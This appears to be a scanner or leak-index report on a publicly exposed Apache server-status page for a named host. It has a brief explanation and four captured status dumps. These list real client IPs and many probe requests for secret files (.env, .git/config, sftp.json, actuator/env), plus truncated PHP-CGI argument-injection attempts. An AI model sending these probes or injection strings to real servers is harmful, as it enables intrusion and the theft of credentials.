/ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-7836982750/0/146456_ 0.000273223071710.00.002809.53 142.93.64.15http/1.1 4-7836982740/2/133893_ 0.0510189032790.00.002447.59 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-7836982740/1/132425_ 0.0500219986680.00.002417.50 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-7836982740/1/135335_ 0.0510190988280.00.002494.92 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-7836982740/1/133257_ 0.0400197714400.00.002466.08 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-7836982740/1/136187_ 0.0510189705670.00.002453.55 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-7836982740/1/133189_ 0.0520182958310.00.002561.35 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-7836982740/0/136051_ 0.0020255750840.00.00
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8202ce7af
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 09-Jan-2026 20:55:39 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 137 Parent Server MPM Generation: 136 Server uptime: 8 days 22 hours 26 minutes 10 seconds Server load: 0.00 0.04 0.00 Total accesses: 157964 - Total Traffic: 5.4 GB - Total Duration: 120852379 CPU Usage: u83.02 s69.43 cu1091.05 cs827.26 - .268% CPU load .205 requests/sec - 7.3 kB/second - 35.8 kB/request - 765.063 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01952857no0yes010000 11952856no0yes19000 21952855no0yes010000 31952858no3yes010002 41952988no0yes010000 Sum503 149002 __________________W_______________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-13619528570/117/2922_ 17.0015016865150.06.0895.54 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-13619528570/128/2865_ 17.008013500500.03.0496.23 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-13619528570/120/2892_ 16.811416719623540.05.3981.59 172.69.17.163h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/123/2898_ 17.0010015753910.015.33137.20 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-13619528570/128/2913_ 16.5648025481850.012.35109.01 185.177.72.60http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 0-13619528570/140/2817_ 17.017015031980.06.9086.01 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-13619528570/137/2862_ 16.83514317922170.026.65116.08 172.69.17.163h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/145/2876_ 16.5248031792320.05.0785.46 185.177.72.60http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/134/2860_ 16.83616042900460.014.5188.05 172.69.17.163h2tandemsl.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 0-13619528570/121/2794_ 16.999015059710.03.60124.91 162.158.79.116h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/328/2951_ 27.2911017254960.08.85100.34 128.199.182.55http/1.1 1-13619528560/292/2997_ 27.298024849740.05.90127.22 172.68.245.100h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/313/2917_ 27.3212020929300.09.63149.29 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-13619528560/309/3001_ 27.332036050170.06.58102.71 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-13619528560/337/2936_ 27.320020150360.014.1685.14 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 1-13619528560/319/2918_ 27.321014937250.018.41112.28 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-13619528560/326/2988_ 27.331038053240.015.50127.12 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-13619528560/324/2993_ 27.332041465750.07.79117.48 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-13619528560/305/2890W 27.240015736640.06.67125.10 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-13619528560/297/2907_ 27.329019431600.013.45108.94 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-13619528550/46/3177_ 11.4848043659780.023.3191.77 185.177.72.60http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/46/3152_ 11.634860426010750.01.9478.10 172.70.43.53h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/47/3141_ 11.9053024616820.00.87102.64 104.23.213.61h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/54/3228_ 11.9111014660700.01.65130.58 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-13619528550/58/3188_ 11.874663529528690.01.4388.95 172.71.184.83h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/36/3264_ 11.51119027438030.00.9067.05 185.177.72.60http/1.1barrerasdecontencion.com:80GET /config.json HTTP/1.1 2-13619528550/48/3147_ 11.48109122484460.01.5372.34 185.177.72.60http/1.1barrerasdecontencion.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-13619528550/53/3192_ 11.5153021232600.01.5783.66 185.177.72.60http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /application.yml HTTP/1.1 2-13619528550/55/3171_ 11.9051020917950.02.16125.68 172.70.38.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/45/3238_ 11.414657516631440.00.7395.87 172.64.200.235h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/280/3519_ 26.786039359020.06.52109.23 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-13619528580/287/3502_ 26.762017310430.023.12126.65 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 3-13619528580/291/3484_ 26.7131520630340.010.05120.72 162.158.122.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/293/3553_ 26.784018583960.07.52151.44 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-13619528580/300/3566_ 26.741241029273410.08.40155.21 172.71.191.15h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-13619528580/279/3492_ 26.764324515640.06.6997.21 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-13619528580/277/3521_ 26.78936729260030.06.69110.90 108.162.237.120h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/261/3445_ 26.7317063242800.05.40127.72 104.23.213.22h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/303/3491_ 26.30434455618340.015.10163.28 128.199.182.55http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/275/3500_ 26.7613038410710.08.0697.31 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 4-13619529880/71/3308_ 13.6348019974520.02.17118.08 185.177.72.60http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-13619529880/72/3181_ 13.521280014780950.04.9880.20 185.177.72.65http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 4-13619529880/93/3277_ 13.631280012184530.04.46108.25 185.177.72.60http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /bootstrap/.env HTTP/1.1 4-13619529880/71/3241_ 13.5353011652020.05.23109.25 185.177.72.65http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /bootstrap/.env HTTP/1.1 4-13619529880/76/3255_ 13.58129943416147280.02.25113.77 162.158.103.33h2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc864587e18
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 02-Jan-2026 19:04:49 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 14 Parent Server MPM Generation: 13 Server uptime: 1 day 20 hours 35 minutes 20 seconds Server load: 0.05 0.07 0.02 Total accesses: 30543 - Total Traffic: 753.5 MB - Total Duration: 21785956 CPU Usage: u51.99 s45.09 cu149.08 cs122.65 - .23% CPU load .19 requests/sec - 4922 B/second - 25.3 kB/request - 713.288 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01822018no0yes010000 11822019no1yes19000 21822020no1yes010000 31822021no0yes010000 41822151no0yes010000 Sum502 149000 _______________W__________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1318220180/47/148_ 13.0911520279550.00.333.00 172.71.31.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/38/135_ 13.58231169780.00.362.42 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-1318220180/33/131_ 13.0711400143650.00.4514.38 172.69.71.128h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/37/137_ 13.0711402205200.00.462.52 104.22.24.115h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/35/122_ 13.06220180610.00.442.64 104.22.24.185h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/38/126_ 13.0911520182040.00.573.69 104.22.1.73h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/40/131_ 13.151157593292550.00.682.30 172.71.190.53h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/28/128_ 12.7813082173820.00.622.13 172.70.42.86h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/33/119_ 13.171145562225470.01.132.18 104.23.211.45h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/28/128_ 13.0613080162920.00.283.14 104.22.1.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/143/472_ 19.01901623400.02.5311.01 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-1318220190/155/492_ 18.8542067923800.014.7827.50 172.70.42.70h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/156/501_ 19.030010671080.02.0231.36 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-1318220190/153/506_ 19.027015372290.07.9216.20 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-1318220190/159/510_ 18.8512075459240.02.7010.55 172.71.195.46h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/156/494W 18.82001753320.03.5710.97 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-1318220190/155/501_ 19.032017487150.03.4731.82 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-1318220190/165/520_ 19.016010970790.09.5333.51 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-1318220190/152/492_ 19.03103086660.03.269.78 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-1318220190/150/517_ 18.992325682560.01.8523.10 188.114.111.92h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1318220200/243/605_ 20.211301876500.03.779.98 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 2-1318220200/224/596_ 20.22602080520.02.7810.72 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-1318220200/227/568_ 20.211401850650.015.5321.91 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 2-1318220200/233/602_ 20.11153531734180.03.1012.36 162.159.103.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1318220200/247/591_ 20.147251763400.03.3810.10 162.158.120.204h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1318220200/243/611_ 19.9432512110810.02.8710.60 108.162.237.121h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1318220200/213/566_ 20.22801663470.02.247.95 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-1318220200/240/588_ 20.221502022020.02.8211.53 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 2-1318220200/216/571_ 20.211601672020.03.9326.57 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 2-1318220200/228/607_ 20.221401941050.02.4913.57 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-1318220210/36/526_ 13.914211971142390.01.699.06 172.71.31.181h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/30/531_ 13.4539601453660.00.239.40 81.0.57.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-1318220210/36/527_ 13.9240101621220.00.999.30 162.158.123.223h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/38/545_ 13.4341601261530.00.4814.77 172.68.70.232h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/39/534_ 13.0044601828240.00.4013.40 172.68.134.245h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/40/515_ 13.30212931463690.01.619.56 172.71.103.3h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/31/535_ 14.082101460860.00.539.39 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 3-1318220210/38/532_ 13.10416038609670.00.6116.50 172.69.90.170h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/31/533_ 13.4539601217070.01.027.72 172.71.30.135h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/34/531_ 12.3140115511456740.00.308.02 172.70.134.107h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1318221510/235/1359_ 18.852103848020.03.8036.21 172.69.70.56h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1318221510/225/1259_ 18.8536706287320.03.2419.90 104.23.245.161h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1318221510/250/1279_ 18.8338403897500.04.5838.49 108.162.237.72h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1318221510/235/1312_ 19.233723884837390.04.4623.58 162.158.175.192h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1318221510/233/1334_ 18.8536708555660.03.6920.77 172.71.31.166h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1318221510/223/1285_ 18.8338407839080.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8e805360d
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 26-Dec-2025 17:59:08 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 64 Parent Server MPM Generation: 63 Server uptime: 13 days 10 hours 55 minutes 2 seconds Server load: 0.14 0.21 0.14 Total accesses: 366100 - Total Traffic: 11.8 GB - Total Duration: 375102304 CPU Usage: u100.12 s95.23 cu2039.13 cs1271.08 - .302% CPU load .315 requests/sec - 10.6 kB/second - 33.7 kB/request - 1024.59 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01299522no2yes19001 11299392no1yes010000 21299390no0yes010000 31299391no0yes010000 41299389no0yes010000 Sum503 149001 ________W_________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6312995220/504/8310_ 35.172037033590.07.28294.66 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-6312995220/526/8767_ 34.9718747882860.07.46278.25 4.197.94.190http/1.1barrerasdecontencion.com:443done, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 0-6312995220/540/8297_ 35.1763476096080.09.68265.76 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6312995220/539/8542_ 35.161041557980.035.07255.84 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-6312995220/545/8294_ 35.156038911070.012.39202.21 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-6312995220/543/8538_ 35.173085596630.023.09251.08 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-6312995220/527/8345_ 35.170043929400.014.53357.82 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-6312995220/521/8687_ 35.161049423390.010.85237.94 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6312995220/541/8286W 35.140094442530.030.25362.72 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-6312995220/525/8491_ 35.11134739439210.07.47262.06 172.71.15.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/230/6318_ 23.47121631393290.02.67251.88 172.68.213.165h2tandemsl.com:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 1-6312993920/250/6253_ 23.50217037891810.02.71172.31 172.71.15.148h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-6312993920/239/6160_ 23.5582045954650.09.39205.16 77.225.201.248h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/227/6078_ 23.565033917270.01.84121.11 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-6312993920/233/6349_ 23.56657739013320.04.61198.11 172.68.22.84h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/238/6180_ 23.543043936220.02.52190.98 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 1-6312993920/251/6147_ 23.5410153581570.03.59172.49 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/237/6235_ 23.562042549440.02.18188.72 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-6312993920/240/6148_ 23.49338769202340.02.38227.27 172.71.15.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/232/6347_ 23.45348143704650.03.02142.98 172.68.213.165h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/236/6889_ 25.186040968010.02.33302.40 188.166.108.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-6312993900/223/6855_ 23.8726820859634860.03.20256.30 104.23.254.14h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/239/6960_ 23.862687043611120.03.60224.27 172.69.39.86h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/236/6938_ 22.302682090998670.03.15199.86 162.159.119.36h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/248/6918_ 21.45270694644237570.02.32284.31 108.162.216.229h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/231/7036_ 22.314036942210.04.34250.85 162.158.63.133h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/240/6949_ 24.352687053715110.05.17288.99 104.23.254.127h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/238/6977_ 24.032701043192410.02.56222.35 172.70.215.43h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/227/6798_ 24.032701040773920.04.12287.86 172.70.206.71h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/233/7101_ 24.352706049464990.015.08223.46 172.69.39.24h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/50/8683_ 17.023800053606560.01.01270.16 162.158.120.223h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/54/8520_ 17.692699067239300.00.68261.09 104.23.190.204h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/49/8406_ 17.7038000132794510.00.55307.49 104.23.253.85h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/54/8566_ 19.482694059489490.01.20268.23 172.68.18.142h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/43/8808_ 19.433778157527360.01.49297.58 172.71.239.118h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/58/8393_ 16.062694055637920.00.54254.12 172.70.108.61h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/49/8615_ 19.9227004182943480.02.33249.66 172.69.11.102h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/58/8774_ 19.53380534060642560.01.00381.57 162.158.41.30h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/50/8679_ 15.6737971257308400.00.74304.94 77.225.201.248h2relehse.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-6312993910/55/8584_ 19.303857250233870.08.21256.01 186.109.132.119h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-6312993890/232/6361_ 23.85116187169815360.02.60253.59 172.71.15.148h2tandemsl.com:443idle, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 4-6312993890/242/6206_ 23.8211137747980630.04.56168.04 172.71.15.148h2tandemsl.com:443done, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 4-6312993890/217/6374_ 23.8312419465909700.02.45217.27 172.71.15.148h2tandemsl.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 4-6312993890/269/6457_ 23.8213133049099770.04.32243.36 172.71.15.148h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-6312993890/237/6425_ 23.8312731842496370.02.11180.71 172.71.15.148h2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc89273b519
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 24-Dec-2025 20:32:50 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 58 Parent Server MPM Generation: 57 Server uptime: 11 days 13 hours 28 minutes 44 seconds Server load: 0.04 0.09 0.08 Total accesses: 335688 - Total Traffic: 11.0 GB - Total Duration: 265335054 CPU Usage: u25.06 s33.63 cu1911.59 cs1161.72 - .314% CPU load .336 requests/sec - 11.5 kB/second - 34.3 kB/request - 790.422 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01171907no1yes010000 11171777no0yes010000 21171775no0yes19000 31171776no0yes010000 41171774no1yes010000 Sum502 149000 _____________________________W____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5711719070/3/7282_ 0.1011033496110.00.40272.84 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-5711719070/1/7718_ 0.1121438954980.00.00244.40 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/4/7228_ 0.103071020290.00.06234.11 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-5711719070/1/7463_ 0.0918037533730.00.00203.28 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 0-5711719070/1/7239_ 0.091033233740.00.01175.54 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 0-5711719070/0/7483_ 0.0023275450470.00.00208.93 142.93.0.66http/1.1pre.relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/1/7284_ 0.0922037460150.00.00329.38 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 